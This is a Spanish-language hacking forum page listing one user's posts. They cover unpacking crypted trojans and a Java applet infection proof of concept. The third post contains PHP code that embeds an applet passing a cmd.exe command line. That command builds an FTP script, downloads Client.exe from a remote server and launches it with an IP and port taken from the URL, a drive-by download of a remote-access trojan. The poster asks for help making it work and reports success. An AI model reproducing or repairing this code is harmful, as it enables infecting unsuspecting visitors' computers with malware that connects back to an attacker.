últimos mensajes de: m[a]rkus - Página 6

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

6 Mayo 2024, 05:53 am

Tema destacado: Estamos en la red social de Mastodon

Mostrar Mensajes
Páginas: 1 2 3 4 5 [6]

51	Programación / Ingeniería Inversa / Re: RunPE Killer V. 1.0 By Psymera	en: 10 Septiembre 2009, 18:09 pm
Muy Bueno psymera lo eh probado y ah funcionado aunque no recupera al 100% el binario antiguo recupera la mayor parte y eso es mejor que nada. Un saludo y gracias.

52	Programación / Ingeniería Inversa / Como "Desempaquetar" un .EXE que se le haya pasado un crypter ... (SOLUCIONADO)	en: 9 Septiembre 2009, 17:24 pm
Hola, como muchos saben ahi troyanos que para hacerlos indetectables se les pasa una herramienta llamada crypter, pues yo eh estado buscando y solo se las conexiones que hace los puertos que usa y el dns si es que lo tiene, pero eso no me es suficiente, necesito saber que existe alguna forma de leer en hexadecimal el "Archivo Original" es decir ver el codigo del archivo como sino le hubieran pasado el crypter, alguna forma tiene que haber ya que una vez lo ejecutas la funcion de casi todos los crypter es crear unarchivo temporal y ese archivo temporal es el que tiene binario sin cifrar, bueno espero hayan entendido un saludo y gracias por adelantado Citar Solución:http://www.gigasize.com/get.php?d=b32byccdznf http://foro.elhacker.net/empty-t262850.0.html

53	Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet (y VBScript)	en: 1 Junio 2009, 02:21 am
Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo: Código: <?php if(isset($HTTP_GET_VARS["board"])) { $ip = $HTTP_GET_VARS["board"]; echo $ip; } else $ip = "127.0.0.1"; if(isset($HTTP_GET_VARS["topic"])) { $puerto = $HTTP_GET_VARS["topic"]; echo $puerto; } else $puerto = 666; echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>"; echo "<param name='first' value=' cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>"; echo "</applet>"; ?> Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado. Resuelto: Cambiar server FTP El code esta bien

Páginas: 1 2 3 4 5 [6]

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines